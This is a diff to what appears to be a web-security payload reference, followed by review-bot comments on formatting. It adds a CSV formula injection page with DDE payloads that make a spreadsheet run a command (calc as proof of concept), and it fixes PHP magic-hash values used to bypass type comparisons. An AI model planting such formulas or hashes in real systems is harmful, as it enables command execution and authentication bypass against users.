diff --git a/CSV injection/README.md b/CSV injection/README.md index c707ab4..69a64c3 100644 --- a/CSV injection/README.md +++ b/CSV injection/README.md @@ -1,12 +1,29 @@ -# Title -Lorem +# CSV Excel formula injection +Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel,Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed. -## Vuln +## Exploit + +Basic exploit with Dynamic Data Exchange +``` +DDE ("cmd";"/C calc";"!A0")A0 +@SUM(1+1)*cmd|' /C calc'!A0 + +Technical Details of the above payload: +cmd is the name the server can respond to whenever a client is trying to access the server +/C calc is the file name which in our case is the calc(i.e the calc.exe) +!A0 is the item name that specifies unit of data that a server can respond when the client is requesting the data ``` -Code + +Any formula can be started with +``` += ++ +– +@ ``` ## Thanks to -* Lorem -* Ipsum \ No newline at end of file +* https://owasp.org/index.php/CSV_Excel_Macro_Injection +* https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection +*https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/ \ No newline at end of file diff --git a/PHP juggling type/README.md b/PHP juggling type/README.md index 7386e90..99ade0a 100644 --- a/PHP juggling type/README.md +++ b/PHP juggling type/README.md 
@@ -18,7 +18,7 @@ var_dump('0xABCdef' == ' 0xABCdef'); | Hash | “Magic” Number / String | Magic Hash | Found By | | ---- | -------------------------- |:---------------------------------------------:| -------------:| | MD5 | 240610708 | 0e462097431906509019562988736854 | Michal Spacek | -| SHA1 | col 3 is | 0e07766915004133176347055865026311692244 | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham | +| SHA1 | 10932435112 | 0e07766915004133176347055865026311692244 | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham | ## Thanks to diff --git a/README.md b/README.md index 4f6a578..0379aa5 100644 --- a/README.md +++ b/README.md @@ -3,7 +3,6 @@ A list of usefull payloads and bypasses for Web Application Security TODO: * PHP Serialization -* CSV Injection To improve: * RCE @@ -15,9 +14,6 @@ To improve: * Traversal Directory * XSS * PHP Include +* CSV Injection -TODO v2: -* Remove "_" in dir name -* Add CVE : Hearbleed and ShellShock ? - -# /!\ Work in Progress : 40% +# /!\ Work in Progress : 70%
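Review bot: In the `CSV injection/README.md` hunk, the third entry under "Any formula can be started with" is an en dash (`–`), not the ASCII hyphen-minus (`-`) that spreadsheet applications treat as a formula prefix. Anyone building an export filter from this list would miss the real trigger character, so replace it with `-`. In the same hunk, the "Technical Details of the above payload:" lines sit inside the payload's code fence and should move below the closing fence as prose. The last "Thanks to" entry (`*https://www.contextis.com/...`) is missing the space after `*` and will not render as a list item, and "Excel,Libre Office" needs a space after the comma.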
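Review bot: In the second `README.md` hunk (`@@ -15,9 +14,6 @@`), the whole "TODO v2" block is deleted, but nothing in this patch adds the CVE entries that block asked for. If that item is deferred rather than dropped, keep its line or move it under "TODO" so it is not lost. The bump from 40% to 70% also reads as large for a patch whose only new content is the CSV injection page. The context line "A list of usefull payloads" in the first `README.md` hunk still has the "usefull" typo and could be fixed in the same pass.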